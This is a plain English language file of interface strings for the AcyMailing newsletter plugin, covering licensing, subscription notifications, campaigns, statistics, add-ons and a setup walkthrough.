ACYM_WEBSITE_NOT_FOUND="Website not found, please contact us for more information"
ACYM_ERROR_ON_CALL_ACYBA_WEBSITE="An error occurred while calling acymailing.com"
ACYM_PLEASE_SET_A_LICENSE_KEY="Please set a license key"
ACYM_GET_MY_LICENSE_KEY="Get my license key!"
ACYM_YOUR_LICENSE_KEY="Your license key:"
ACYM_ATTACH_MY_LICENSE="Attach my license"
ACYM_UNLINK_MY_LICENSE="Unlink my license"
ACYM_LICENSE="License"
ACYM_MY_LICENSE="My license"
ACYM_COULD_SET_LICENSE_KEY="We couldn't set the license key attached to this website, try to assign it in the configuration"
ACYM_ON_THE_MODULE="On the module itself"
ACYM_IN_HEADER="In the header"
ACYM_MODULE_JS_DESC="How should AcyMailing add the necessary JS files"
ACYM_MODULE_JS="Load javascript module"
ACYM_COULD_NOT_SAVE_THUMBNAIL_ERROR_X="Could not save the thumbnail of this template. Error: %s"
ACYM_EMAILS_REMOVED_QUEUE_CLEAN="%s emails removed from the queue for unconfirmed or inactive users"
ACYM_CHECKDB_DUPLICATED_URLS_REMAINING="Some duplicated URLs have been removed, but there are still duplicates. Script interrupted to avoid impacting performances. You can re-run the check to continue until a success message is displayed"
ACYM_CHECKDB_DUPLICATED_URLS_SUCCESS="[OK]Problem solved: Duplicated URLs successfully removed"
ACYM_CHECKDB_DUPLICATED_URLS="Duplicated URLs found in the acym_url table"
ACYM_CHECKDB_ADD_INDEX_ERROR="[ERROR]Could not add the %1$s on the table %2$s : %3$s"
ACYM_CHECKDB_ADD_INDEX_SUCCESS="[OK]Problem solved: Added %1$s to %2$s"
ACYM_CHECKDB_MISSING_INDEX="%1$s missing in %2$s"
ACYM_CHECKDB_ADD_COLUMN_ERROR="[ERROR]Could not add the column %1$s on the table %2$s : %3$s"
ACYM_CHECKDB_ADD_COLUMN_SUCCESS="[OK]Problem solved: Added %1$s in %2$s"
ACYM_CHECKDB_MISSING_COLUMN="Column %1$s missing in %2$s"
ACYM_CHECKDB_CREATE_TABLE_ERROR="[ERROR]Could not create the table %1$s : %2$s"
ACYM_CHECKDB_CREATE_TABLE_SUCCESS="[OK]Problem solved: Table %s created"
ACYM_CHECKDB_REPAIR_TABLE_ERROR="[ERROR]Could not repair the table %1$s : %2$s"
ACYM_CHECKDB_REPAIR_TABLE_SUCCESS="[OK]Problem solved: Table %s repaired"
ACYM_CHECKDB_LOAD_COLUMNS_ERROR="Could not load columns from the table %1$s : %2$s"
ACYM_REGISTERED_TO="Registered to %1$s"
ACYM_COULD_NOT_DELETE_ATTACHMENT="Could not delete the attachment"
ACYM_ATTACHMENT_WELL_DELETED="Attachment well deleted"
ACYM_X1_AND_X2="%1$s and %2$s:"
ACYM_SPACE_BETWEEN_BLOCK="Space between blocks:"
ACYM_NOTIFICATION_CREATE="When a new user is created, send an e-mail to"
ACYM_NOTIFICATION_CREATE_SUBJECT="New subscriber on your website"
ACYM_NOTIFICATION_CREATE_BODY="A new user has been created in AcyMailing:"
ACYM_NOTIFICATION_UNSUB="When a user unsubscribes from a list, send an e-mail to"
ACYM_NOTIFICATION_UNSUB_SUBJECT="A user unsubscribed"
ACYM_NOTIFICATION_UNSUB_BODY="The following user unsubscribed from your list(s):"
ACYM_NOTIFICATION_UNSUBALL="When a user unsubscribes from all lists, send an e-mail to"
ACYM_NOTIFICATION_UNSUBALL_SUBJECT="A user unsubscribed from all your lists"
ACYM_NOTIFICATION_UNSUBALL_BODY="The following user unsubscribed from all your lists:"
ACYM_NOTIFICATION_SUBFORM="When a user submits the subscription form"
ACYM_NOTIFICATION_SUBFORM_SUBJECT="New contact from your website"
ACYM_NOTIFICATION_SUBFORM_BODY="A user submitted the subscription form:"
ACYM_NOTIFICATION_PROFILE="When a user changes their profile"
ACYM_NOTIFICATION_PROFILE_SUBJECT="A user subscribed or modified their subscription"
ACYM_NOTIFICATION_PROFILE_BODY="A user changed their profile:"
ACYM_NOTIFICATION_CONFIRM="When a user confirms their subscription"
ACYM_NOTIFICATION_CONFIRM_SUBJECT="A user confirmed their subscription"
ACYM_NOTIFICATION_CONFIRM_BODY="The following user confirmed their subscription:"
ACYM_SUBSCRIPTION_CONFIRMATION_BUTTON_DESC="This button will confirm the user subscription and then redirect him to your homepage"
ACYM_UNSUBSCRIBE_BUTTON_DESC="This button will redirect the user to the unsubscribe page or it will unsubscribe him directly, depending on the configuration"
ACYM_SUBSCRIPTION_CONFIRMATION="Subscription confirmation"
ACYM_BUTTON_TYPE="Button type"
ACYM_CALL_TO_ACTION="Call to action"
ACYM_TEMPLATE_CREATED="Template created"
ACYM_SAVE_AS_TMPL="Save as template"
ACYM_BE_CAREFUL_THIS_DELETE_ELEMENTS_LINKED_AUTOMATION="Be careful this will delete all the elements linked to the automation"
ACYM_MARGIN_BOTTOM_CONTENT="Content bottom margin"
ACYM_RESIZE_COLUMNS_OF_ROW="Resize the columns of the selected row:"
ACYM_STRUCTURE="Structure"
ACYM_UNABLE_TO_CREATE_MANAGEMENT_LIST="Error when trying to create a management list"
ACYM_MENU_USERS="User management page"
ACYM_MENU_USERS_DESC="Allow users to manage their own users on the front-end of your site, BIND THIS MENU TO A SPECIFIC USER GROUP"
ACYM_MENU_CAMPAIGNS="Campaigns management page"
ACYM_MENU_CAMPAIGNS_DESC="Allow users to manage their own campaigns on the front-end of your site, BIND THIS MENU TO A SPECIFIC USER GROUP"
ACYM_DISPLAY_NUMBER_ENTRIES="Display %s entries"
ACYM_REDIRECT_ON_UNSUBSCRIBE_PAGE="Redirect to an unsubscribe page after the user clicks on an unsubscribe link"
ACYM_UNSUBSCRIBE_PAGE_HEADER="Show the site's header"
ACYM_UNSUBSCRIBE_PAGE="Unsubscribe page"
ACYM_DELETE_THE_USER="Delete the user"
ACYM_REMOVE_USER_SUBSCRIPTION="Remove the user's subscription"
ACYM_FRONT_DELETE_BUTTON="Delete button behaviour"
ACYM_FRONT_DELETE_BUTTON_DESC="Should the delete button really delete the user or simply unsubscribe him from the current list?"
ACYM_FRONTEND_EDITION="Front-end edition"
ACYM_CONFIGURATION_INTERFACE="Interfaces"
ACYM_EDITION="Edition"
ACYM_FRONTEND_X="Frontend %s"
ACYM_BACKEND_X="Backend %s"
ACYM_PREVENT_HYPHENS="Prevent hyphens in text paragraphs"
ACYM_PREVENT_HYPHENS_DESC="This will not work on mobile version for languages without spaces, like Chinese for example."
ACYM_WITHOUT_IMAP_EXT="without imap extension"
ACYM_UNAUTHORIZED_ACCESS="Unauthorized access"
ACYM_MENU_LISTS="List management page"
ACYM_MENU_LISTS_DESC="Allow users to manage their own lists on the front-end of your site, BIND THIS MENU TO A SPECIFIC USER GROUP"
ACYM_WHEN_USER_CONFIRMS_SUBSCRIPTION="When the user confirms his subscription"
ACYM_WHEN_USER_UNSUBSCRIBES="When the user unsubscribes"
ACYM_OUT_OF="out of"
ACYM_RUN_SPAM_TEST="Run spam test"
ACYM_INVISIBLE="Invisible"
ACYM_IN_PAST="In the past"
ACYM_IN_FUTURE="In the future"
ACYM_VISIBLE="Visible"
ACYM_WEEKLY_STATS="Weekly stats"
ACYM_DAILY_STATS="Daily stats"
ACYM_MONTHLY_STATS="Monthly stats"
ACYM_BOUNCE_RULE_COLUMN_STAT="Bounce rule"
ACYM_OPEN_DATE_COLUMN_STAT="Last open date"
ACYM_SEND_DATE_USERSTAT_COLUMN_STAT="Send date"
ACYM_BOUNCE_DETAILS_COLUMN_STAT="Bounces detailed"
ACYM_BOUNCE_UNIQUE_COLUMN_STAT="Bounces"
ACYM_OPEN_TOTAL_COLUMN_STAT="Total opens"
ACYM_OPEN_UNIQUE_COLUMN_STAT="Unique opens"
ACYM_FAIL_COLUMN_STAT="Total send failed"
ACYM_SENT_COLUMN_STAT="Total successfully sent"
ACYM_TOTAL_SUBSCRIBERS_COLUMN_STAT="Total receivers"
ACYM_MAIL_ID_COLUMN_STAT="Mail id"
ACYM_FULL_DATA="Full data"
ACYM_FORMATTED_DATA="Formatted data"
ACYM_CHARTS="Charts"
ACYM_EXPORT_METHOD_NOT_FOUND="Export method not found"
ACYM_EDIT_HTML="Edit HTML"
ACYM_REVERT="Revert"
ACYM_BECAREFUL_EDITING_SOURCE_CODE="Please edit the source code only if you know what you're doing. This might break the whole editor behaviour. Use it at your own risk, support won't be provided for custom modifications."
ACYM_EDIT_BLOCK_HTML="Edit block's HTML"
ACYM_CLICK_HERE_TO_MAKE_CHANGES="Click here if you wish to do some changes"
ACYM_HERE_LISTS_YOU_ARE_SUBSCRIBED_TO="Here are the lists you're subscribed to:"
ACYM_YOUR_NEWSLETTER_SUBSCRIPTIONS="Your newsletter subscriptions"
ACYM_COULD_NOT_SUBMIT_FORM_CONTACT_ADMIN_WEBSITE="Could not submit the form, please contact the admin of the website."
ACYM_NO_DATA_TO_DISPLAY="No data to display"
ACYM_UNSUBSCRIBE_ALL="Unsubscribe from all"
ACYM_ONLY_NEWLY_CREATED_DESC="Only the elements created/published since the last sent automatic campaign will be inserted in your email."
ACYM_MIN_NB_ELEMENTS_DESC="AcyMailing will wait for the number of elements found to reach the value you specify before sending your automatic campaign."
ACYM_AUTO_CAMPAIGNS_OPTIONS="Automatic campaigns options"
ACYM_ALL_EMAILS="All emails"
ACYM_DOWNLOAD_MY_FIRST_ONE="Download my first one!"
ACYM_YOU_DONT_HAVE_ADD_ONS="You don't have add-ons yet."
ACYM_ERROR_FILE_DELETION="An error occurred when deleting the file %s, please delete it manually"
ACYM_ADD_ON_SUCCESSFULLY_UPDATED="Add-on successfully updated"
ACYM_COULD_NOT_UPDATE_ADD_ON="Could not update add-on"
ACYM_UPDATE="Update"
ACYM_ADD_ONS_X="Add-ons (%s)"
ACYM_CHECK_FOR_UPDATES="Check for updates"
ACYM_COULD_NOT_SAVE_ADD_ON="Could not save add-on"
ACYM_ARE_YOU_SURE_DELETE_ADD_ON="Are you sure you want to delete this add-on? Make sure no campaign or automation uses its features!"
ACYM_ADD_ON_SUCCESSFULLY_DELETED="Add-on successfully deleted"
ACYM_ADD_ON_NOT_FOUND="Add-on not found"
ACYM_NEED_LATEST_VERSION_TO_DOWNLOAD="You need the latest version of AcyMailing to download add-ons"
ACYM_PURCHASE="Purchase"
ACYM_MISSING_DOMAIN="Domain missing"
ACYM_NOT_ALLOWED_LEVEL="You're not allowed to download, please attach your website to a valid license first"
ACYM_DOWNLOAD="Download"
ACYM_COULD_NOT_LOAD_INFORMATION="Could not load all information"
ACYM_YOU_DONT_HAVE_THE_RIGHT_LEVEL="You don't have the right AcyMailing edition to download this add-on"
ACYM_ISSUE_WHILE_INSTALLING="An issue occurred while installing the add-on"
ACYM_ISSUE_WHILE_DOWNLOADING="An issue occurred while downloading the add-on"
ACYM_NO_ADD_ONS_TO_DISPLAY="There are no add-ons to display"
ACYM_ADD_ON_SUCCESSFULLY_INSTALLED="Add-on successfully installed"
ACYM_FEATURES="Features"
ACYM_ACYMAILING_LEVEL="AcyMailing edition"
ACYM_EVENTS_MANAGEMENT="Events management"
ACYM_USERS_MANAGEMENT="User management"
ACYM_SUBSCRIPTION_SYSTEM="Subscription system"
ACYM_CONTENT_MANAGEMENT="Content management"
ACYM_E_COMMERCE_SOLTIONS="E-commerce solutions"
ACYM_FILES_MANAGEMENT="Files management"
ACYM_AVAILABLE_ADD_ONS="Available add-ons"
ACYM_MY_ADD_ONS="My add-ons"
ACYM_ADD_ONS="Add-ons"
ACYM_ONLY_NEWLY_CREATED="Only newly created"
ACYM_ONLY_FEATURED="Only featured elements"
ACYM_START_FROM_EMPTY_TEMPLATE="Start from empty template"
ACYM_USERS_EXPORTED="Users have been exported to %s"
ACYM_UNWRITABLE_FILE="Unable to write in the file %s"
ACYM_SUMMARY_IN_CATEGORY=" %1$s the category %2$s"
ACYM_RSS_LOAD_ERROR="The RSS feed could not be loaded"
ACYM_MIN_NB_ELEMENTS="Min. number of elements"
ACYM_AUTHOR="Author"
ACYM_URL="URL"
ACYM_SAVE_AND_SEND_TEST="Save & Send a test"
ACYM_SEE_HOW_AMAZING_YOUR_EMAIL="See how amazing your email is!"
ACYM_ARCHIVE_POPUP="Open the campaigns in a popup"
ACYM_ARCHIVE_POPUP_DESC="If turned Off, the campaigns will be opened in a new tab"
ACYM_LISTS_ARCHIVE="Only the campaigns sent to the selected lists will be shown. Leave blank for all lists"
ACYM_WELCOME_MAIL_DESC="If you specify a welcome email, the users will receive it when they subscribe to the list"
ACYM_UNSUBSCRIBE_MAIL_DESC="If you specify an unsubscribe email, the users will receive it when they unsubscribe from the list"
ACYM_PENDING="Pending"
ACYM_FAIL_RATE="Fail rate"
ACYM_SAVE_LIST_FIRST="Save the list first"
ACYM_DELIVERY_RATE="Delivery rate"
ACYM_DISABLED="Disabled"
ACYM_STATS_START_DATE_LOWER="Please enter a start date under the end date"
ACYM_CONTENT_NOT_FOUND="The content %s could not be found"
ACYM_GENERATE_CAMPAIGN_NOT_ENOUGH_CONTENT="Not enough elements for the dynamic content %1$s: %2$s/%3$s"
ACYM_ACTIVATE="Activate"
ACYM_BCC_DESC="The campaign will also be sent to the email addresses you specify but they will be invisible for original subscribers. Note that the BCC is added on every email so if you send the newsletter to 1500 users, your BCC address will get 1500 emails in its mailbox!"
ACYM_ADDITIONAL_SETTINGS="Additional settings"
ACYM_DEACTIVATE="Deactivate"
ACYM_X_CAMPAIGN_GENERATED="%s campaign(s) generated"
ACYM_CAMPAIGN_NOT_GENERATED="Campaign [%s] not generated: %s"
ACYM_AUTO_CAMPAIGN_DELETED="The initial automatic campaign has been deleted"
ACYM_ISSUE_NB="Occurrence number of the automatic campaign"
ACYM_REPLYTO_SUMMARY="Reply-to:"
ACYM_WAITING_FOR_CONFIRMATION="Waiting for confirmation"
ACYM_CONFIRM_AUTOCAMPAIGN="Ask for confirmation before sending the generated campaigns"
ACYM_GENERATED="Generated"
ACYM_CAMPAIGN_HAS_BEEN_DISABLED="This campaign has been disabled"
ACYM_CAMPAIGN_HAS_BEEN_SENT_ON_X="This campaign has been sent on the %s"
ACYM_COULD_NOT_LOAD_CAMPAIGN="Could not load the campaign"
ACYM_LISTS_SUMMARY="Lists:"
ACYM_CAMPAIGN_GENERATED_BY="This campaign has been generated from %s"
ACYM_FROM_SUMMARY="From:"
ACYM_THIS_WILL_GENERATE_CAMPAIGN_AUTOMATICALLY="This campaign will automatically generate and send a new campaign"
ACYM_DEACTIVATE_CAMPAIGN="Deactivate campaign"
ACYM_ACTIVE_CAMPAIGN="Activate campaign"
ACYM_CAMPAIGN_IS_ACTIVE="This campaign is now active and will generate new campaigns"
ACYM_AUTO="Automatic"
ACYM_BE_CAREFUL_SENDING_DATE_IN_PAST="Be careful you've set a date in the past, this campaign will be directly sent"
ACYM_NO_FIELDS_BIRTHDAY_TRIGGER="You don't have any date custom field in AcyMailing. If you want to use this trigger, you have to create one. Please go to the &quot;Custom fields&quot; menu to create one."
ACYM_FOR_THE_X_FIELD_X="for the %1$s field <strong>%2$s</strong>"
ACYM_AT_DATE_TIME="at %1$s:%2$s"
ACYM_X_DAYS_BEFORE_BIRTHDAY="%s day(s) before the user's birthday"
ACYM_BIRTHDAY_TRIGGER_INFO="The automation will be triggered every year based on the &quot;Field&quot; provided"
ACYM_TRIGGER_EVENT_BEFORE_BIRTHDAY="Trigger %s day(s) before the date at %s&nbsp;:&nbsp;%s"
ACYM_FIELD="Field"
ACYM_ON_USER_BIRTHDAY="On user birthday"
ACYM_REPLACE_CONFIRM="Are you sure you want to replace the content of your email by your selection?"
ACYM_NO_USERS_FOUND="No user found"
ACYM_ALREADY_SENT="This campaign has already been sent, do you want to send it to your new users only?"
ACYM_ALREADY_SENT_ALL="No, send to all users"
ACYM_SELECTED_LIST="Selected lists"
ACYM_AVAILABLE_LIST="Available lists"
ACYM_SELECTED_USER="Selected users"
ACYM_AVAILABLE_USER="Available users"
ACYM_WELL_DONE_DROP_HERE="Well done, now drop it here!"
ACYM_DRAG_BLOCK_AND_DROP_HERE="Drag a block from the &quot;contents&quot; section then drop it here to start"
ACYM_TEMPLATE_EMPTY="Your template is empty!"
ACYM_CONTENT_TYPE="Content type"
ACYM_OPERATION_NOT_FOUND="Operation not found: %s"
ACYM_DATE_FORMAT_LC5="m/d/Y"
ACYM_CONTENT_TO_INSERT="Content to insert"
ACYM_OTHER_OPTIONS="Other options"
ACYM_PREVIEW_DESC="This is a preview, the content that will be sent can be seen on the summary page"
ACYM_NO_DCONTENT_TEXT="No content found based on the criteria you've selected"
ACYM_PREVIEW="Preview"
ACYM_CHANGE_IMAGE="Change image"
ACYM_POSITION="Position"
ACYM_ENCODING_NOT_SUPPORTED_X="Encoding not supported: %s"
ACYM_YOU_MAY_TURN_ON_OPTION="You may need to turn ON the option %s"
ACYM_NOTIFICATION_NOT_FOUND="Notification not found"
ACYM_NOTIFICATIONS="Notifications"
ACYM_DELETE_ALL="Delete all"
ACYM_YOU_DONT_HAVE_NOTIFICATIONS="You don't have any notifications"
ACYM_WE_ARE_LOADING_YOUR_DATA="We're loading your data"
ACYM_SUBSCRIBE_USERS_TO_THESE_LISTS="Subscribe users to these lists"
ACYM_MISSING_PARAMETERS="Missing parameter(s)"
ACYM_AVAILABLE="available"
ACYM_SELECTED="selected"
ACYM_SELECT_ALL="Select all +"
ACYM_UNSELECT_ALL="Unselect all -"
ACYM_ERROR_INSTALLING_X_TEMPLATE="An error occurred while installing the template %s"
ACYM_SKIP_AND_IMPORT_USERS="Skip and import your first users"
ACYM_HTML_ID_DESC="In HTML the id of an element is unique and used for the CSS"
ACYM_HTML_ID="Block HTML id"
ACYM_CANT_RETRIEVE_TEST_EMAIL="Unable to retrieve AcyMailing test email. Please try to re-install AcyMailing"
ACYM_CANT_RETRIEVE_TESTING_LIST="Unable to retrieve AcyMailing testing list. Please try to re-install AcyMailing"
ACYM_FIRST_EMAIL_NAME="AcyMailing first email"
ACYM_EMPTY_ADDRESS_OR_PASSWORD="The email address or the password is empty"
ACYM_WALKTHROUGH_GMAIL_TEXT="As you're using AcyMailing on a local website, emails can't be sent from your server.<br />That's why your Gmail information are needed. These information are <b>only</b> asked to connect to your Gmail account and send a test email."
ACYM_WHY_DO_WE_NEED_THIS="Why do we need this?"
ACYM_YOUR_GMAIL_ACCOUNT="Your Gmail account"
ACYM_FROM_ADDRESS_INFO="The receivers will see this value for the sender's email address when receiving your emails"
ACYM_FROM_NAME_INFO="The receivers will see this value for the sender's name when receiving your emails"
ACYM_WALKTHROUGH_MAIL_CONFIG_TEXT="During this step, we will configure the information displayed when an email is received."
ACYM_WALKTHROUGH_PHPMAIL_TEXT="The email will be sent from your own server, so based on your server configuration it may end up in the SPAM folder. But don't worry, we will help you to fix this if it happens 😀"
ACYM_YOUR_EMAIL_CONFIGURATION="Your email configuration"
ACYM_MAKE_SURE_NOT_IN_SPAM="Please make sure the email isn’t in the SPAM folder 😉"
ACYM_NO_I_DIDNT="No, I didn't"
ACYM_YES_I_DID="Yes I did!"
ACYM_RESULT_TEXT="The Email has been sent based on your server's configuration, but you may not have received it."
ACYM_DID_YOU_RECEIVE_IT="Did you receive it?"
ACYM_EMAIL_SENT="Email sent! 🚀"
ACYM_FIRST_LIST="Your first receiver list"
ACYM_TEST_LIST_TEXT_1="During the next step we will send the test email to a newly created testing list."
ACYM_TEST_LIST_TEXT_2="Only your email address will be subscribed to this list, but if you want you can add other testing email addresses by clicking the &quot;Add new&quot; button."
ACYM_TEST_LIST_RECEIVER="Receivers for the testing list"
ACYM_EMAIL_ADDRESS="Email address"
ACYM_ADD="Add"
ACYM_ERROR_SAVE_LIST="An error occurred when creating your testing list"
ACYM_AT_LEAST_ONE_USER="Please add at least one user to your testing list."
ACYM_WRONG_ADDRESSES="The following email addresses are incorrect: %s"
ACYM_TESTING_LIST="Testing list"
ACYM_SOMETHING_WENT_WRONG_CONTACT_ON_ACYBA="Something went wrong, please send us an email via the contact form on our website"
ACYM_SEND_NEW_TEST="Send a new test"
ACYM_GMAIL_PASSWORD="Your Gmail password"
ACYM_GMAIL_EMAIL="Your Gmail address"
ACYM_THESE_INFO_ARE_ONLY_ASK_TO_SEND_TEST="These information are only asked to connect to your Gmail account by SMTP and send a test email from AcyMailing. Be sure that we don't store any of these information."
ACYM_TRY_WITH_GMAIL="Try with Gmail integration"
ACYM_ASK_FOR_SUPPORT="Ask for support"
ACYM_CONTACT_ME="Contact me"
ACYM_SIMPLY_PROVIDE_US_EMAIL_WE_GET_BACK="Simply provide us with your email address and we will get back to you as soon as we can 😉"
ACYM_DONT_WORRY_OUR_SUPPORT_WILL_TAKE_A_LOOK="Don't worry our support team will contact you and help you find a solution!"
ACYM_SEEMS_SOMETHING_WENT_WRONG="Well it seems that something went wrong."
ACYM_WHATS_NEXT="What's next?"
ACYM_WALKTHROUGH_HOUSTON="This is Houston, we copy!"
ACYM_CONTACT_WELL_CONTACT_YOU="Don't worry, the AcyMailing support team will contact you as soon as possible."
ACYM_CONTACT_NEEDED_INFO="They will provide you with all the needed information to help you send your first email with AcyMailing."
ACYM_CONTACT_DIRECT="If you don't receive our message after some days, don't hesitate to directly %s"
ACYM_GET_IN_TOUCH="get in touch with us"
ACYM_PLEASE_REINSTALL_ACYMAILING="Please re-install AcyMailing to install the first email"
ACYM_HERE_IT_LOOKS_FEEL_FREE_TO_MODIFY="Here is how it looks like. Feel free to modify it (and test our drag and drop editor) if you want to!"
ACYM_YOUR_FIRST_EMAIL="Your first email"
ACYM_WE_ARE_GOING_TO_CONFIGURE_ACY_SIMPLE_TEST="We are going to configure AcyMailing through a simple test email."
ACYM_FINISH="Finish"
ACYM_WALKTHROUGH_SUCCESS="Hurrah!"
ACYM_WALK_SUCCESS_1="We're glad everything went well, time to import your users!"
ACYM_WALK_SUCCESS_2="We hope you will enjoy AcyMailing as much as we do 😃"
ACYM_YOU_DONT_DESERVE_IT="No, you don't deserve it"
ACYM_LEAVE_FIVE_STAR="Leave a 5 ⭐️ review"
ACYM_THIS_WILL_HELP_ON_WORDPRESS="This will help us to grow on WordPress and keep up the good job. Thanks a lot!"
ACYM_IF_YOU_LOVE_GO_FIVE_STARS="So if you love our plugin or if you think the job done on AcyMailing deserves a 5⭐ rating then please do it!"
ACYM_EVEN_SUPER_HEREOS_NEED_HELP="Sometimes, even super heroes need some help 😉"
ACYM_HELP_ACYMAILING_TO_GROW_VISIBILITY="Help AcyMailing to grow its visibility on WordPress"
ACYM_WE_NEED_YOUR_HELP="We need your help!"
ACYM_HTML_TAG="HTML tag"
ACYM_LINKS="Links"
ACYM_SUBSCRIBE_OPTION_ON_XX_CHECKOUT="Display a subscribe option on %s checkout"
ACYM_SUBSCRIBE_OPTION_ON_XX_CHECKOUT_DESC="Let the user choose if he wants to subscribe during checkout."
ACYM_SUBSCRIBE_OPTION_AUTO_SUBSCRIBE_TO_DESC="If the user chooses to subscribe, he will be automatically subscribed to the selected lists (not displayed on your subscription form)."
ACYM_SUBSCRIBE_NEWSLETTER="Subscribe to the newsletter"
ACYM_SUBSCRIBE_CAPTION="Subscribe zone label"
ACYM_SUBSCRIBE_CAPTION_DESC="Text displayed next to the lists selection zone. If you don't specify anything, a default text will be used."
ACYM_SUBSCRIBE_CAPTION_OPT_DESC="Text displayed next to the subscribe checkbox. If you don't specify anything, a default text will be used."
ACYM_LISTS_POSITION="Display the lists after"
ACYM_LOADING_ERROR="Loading error, please refresh the page and retry."
ACYM_SURE_LETS_DO_IT="Sure!"
ACYM_CONTACT_EMAIL="Contact email"
ACYM_THANKS_FOR_INSTALLING_ACYM="Thank you for installing AcyMailing! 🤩"
ACYM_WALK_THROUGH_STEPS_TO_GET_STARTED="Let's walk through some steps to get started"
ACYM_ACYMAILING_NEWS_AND_COUPON_CODE="AcyMailing news & coupon codes"
ACYM_NO_THANK_YOU="No, thank you"
ACYM_DO_YOU_WANT_NEWS="Would you like to receive AcyMailing news and coupon codes?"
ACYM_TRANSLATION_INSTALLED="%s translation(s) successfully installed"
ACYM_ERROR_LOAD_LANGUAGE="Our server didn't find the language(s) %s, you can start your own translation in the AcyMailing configuration page, tab &quot;Languages&quot; then share it"
ACYM_ERROR_LOAD_LANGUAGES="Could not load the language files from our server, you can update them in the AcyMailing configuration page, tab &quot;Languages&quot; or start your own translation and share it"
ACYM_AVERAGE_OPEN="Average open rate"
ACYM_AVERAGE_CLICK="Average click rate"
ACYM_LISTS_NUMBERS="Lists n° %s"
ACYM_ACTION_CREATED="Created"
ACYM_ACTION_MODIFIED="Modified"
ACYM_ACTION_CONFIRMED="Confirmed"
ACYM_ACTION_UNSUBSCRIBED="Unsubscribed"
ACYM_ACTION_SUBSCRIBED="Subscribed"
ACYM_ACTION_BOUNCE="Bounced"
ACYM_VIEW_DETAILS="View details"
ACYM_VIEW_SOURCE="View source"
ACYM_IP="IP"
ACYM_PAID_VERSION_NEED_UPDATE_ERROR_LICENSE_ATTACH="This website isn't attached to any valid AcyMailing license. Click the &quot;Check Again&quot; button on the Updates page after attaching it."
ACYM_THANKS="Thanks 🙂"
ACYM_REVIEW_FOOTER="If you love AcyMailing please help us by posting a %s review. Thanks for your help!"
ACYM_MAIL="Mail"
ACYM_BOUNCED="Bounced"
ACYM_NOTOPEN="Not Opened"
ACYM_FAILED="Failed"
ACYM_NOTSENT="Not sent"
ACYM_FILTER_STATISTICS_SUMMARY="Where the user has the status %1$s for %2$s [ID: %3$s]"
ACYM_BACKGROUND="Background"
ACYM_TRANSPARENT_BACKGROUND="Transparent background"
ACYM_BACKGROUND_IMAGE="Background image"
ACYM_ADD_NEW="Add new"
ACYM_PADDING="Padding"
ACYM_ALIGNMENT="Alignment"
ACYM_OTHER="Other"
ACYM_FONT_FAMILY="Font family"
ACYM_LINK="Link"
ACYM_FORMATTING="Formatting"
ACYM_FULL_WIDTH_DESC="The button will take all the width available"
ACYM_FULL_WIDTH="Full width"
ACYM_FONT="Font"
ACYM_CRON_URL="Cron URL"
ACYM_CRON_URL_DESC="This URL is needed if you want to use your own cron task. It is the heart of the automatic features"
ACYM_OLD_VERSION="You have an old version"
ACYM_CLICK_UPDATE="Click to update to %s"
ACYM_ORDER_STATUS_CHANGED="When %1$s order status changed to %2$s"
ACYM_END_DATE="End date"
ACYM_ANY_PLAN="Any plan"
ACYM_AN_EVENT_IN="an event in"
ACYM_X_FILE_MISSING="The file %1$s is missing in the folder <pre>%2$s</pre>, please make sure that your host doesn't automatically delete this file using a security script"
ACYM_WHEN_ORDER="When an order is placed"
ACYM_ANY_STATUS="Any status"
ACYM_NEW_EMAIL="New email"
ACYM_GOTO_CONFIG="Go to the configuration"
ACYM_ADD_TO_QUEUE="Add to the queue"
ACYM_EMPTY_QUEUE="Empty the queue"
ACYM_HTML_EDITOR="Website editor"
ACYM_LESS_THAN="Less than"
ACYM_MORE_THAN="More than"
ACYM_EXECUTE_AUTOMATION="Execute this automation..."
ACYM_EMAIL_PREHEADER_DESC="The email preview line is a short text displayed in the receiver's inbox, next to the subject"
ACYM_EMAIL_PREHEADER="Email preview line"
ACYM_FEATURED_IMAGE="Featured image"
ACYM_UNPAUSE_CAMPAIGN_FAIL="Campaign resume failed"
ACYM_PAUSE_CAMPAIGN_FAIL="Campaign pause failed"
ACYM_CAMPAIGN_DUPLICATED_SUCCESS="Campaign successfully duplicated"
ACYM_UNPAUSE_CAMPAIGN_SUCCESSFUL="Campaign successfully resumed"
ACYM_PAUSE_CAMPAIGN_SUCCESSFUL="Campaign successfully paused"
ACYM_UNPAUSE_CAMPAIGN="Resume campaign"
ACYM_NOT_FOUND="%s not found"
ACYM_COULD_NOT_DUPLICATE_EMAIL="Couldn't duplicate the email"
ACYM_ARE_SURE_DUPLICATE_TEMPLATE="Are you sure you want to duplicate this email?"
ACYM_CHOOSE_EXISTING="Choose existing"
ACYM_ANY="Any"
ACYM_REGISTERED="Registered to %1$s and the registration status is %2$s"
ACYM_ANY_EVENT="Any event"
ACYM_FIELDS="Fields"
ACYM_REPORT_SEND_DESC="When should AcyMailing send a report?"
ACYM_REPORT_SAVE_DESC="Which report should AcyMailing save in the log file?"
ACYM_REPORT_SEND_TO_DESC="You can enter one or several e-mail addresses, AcyMailing will send the report to those users."
ACYM_REPORT_SAVE_TO_DESC="Location of the log file"
ACYM_USER_MODIFY_ACYMAILING="A user has been modified in AcyMailing"
ACYM_NEW_USER_ACYMAILING="A new user has been created in AcyMailing"
ACYM_HELLO="Hello"
ACYM_USER_NOT_FOUND="User not found"
ACYM_WRONG_DATE="Wrong date"
ACYM_USER_TRIGGERING_AUTOMATION="User triggering the automation"
ACYM_USER_MODIFICATION="User modification"
ACYM_ADMIN_USER_MODIFICATION_DESC="This automation allows you to send a message to the admin when a user is modified"
ACYM_ADMIN_USER_MODIFICATION="Send notification on user modification"
ACYM_USER_CREATION="User creation"
ACYM_ADMIN_USER_CREATE_DESC="This automation allows you to send a message to the admin when a user is created"
ACYM_ADMIN_USER_CREATE="Send notification on user creation"
ACYM_CUSTOM_HEADERS="Custom headers"
ACYM_SESSION_IS_GOING_TO_END="WARNING: Your session will end in 1 minute, don't forget to save your work!"
ACYM_OF_CLICKS="%s of clicks"
ACYM_X_BOUNCE_OF_X="%1$s sent emails bounced back out of %2$s"
ACYM_X_MAIL_CLICKED_OF_X="%1$s users out of %2$s clicked a link"
ACYM_X_MAIL_OPENED_OF_X="%1$s mails opened out of %2$s"
ACYM_X_MAIL_SUCCESSFULLY_SENT_OF_X="%1$s mails successfully sent out of %2$s"
ACYM_CLICK_MAP="Click map"
ACYM_CLICKS_OUT_OF="%1$s clicks out of %2$s"
ACYM_ALL_MAILS="All mails"
ACYM_NEEDS_SYSTEM_PLUGIN="The system plugin %s must be activated for these options to work"
ACYM_SEND_CONF_REGACY="Send a confirmation email in addition to the site account creation email"
ACYM_DELETE_USER_OF_CMS_USER="Delete the user on site account deletion"
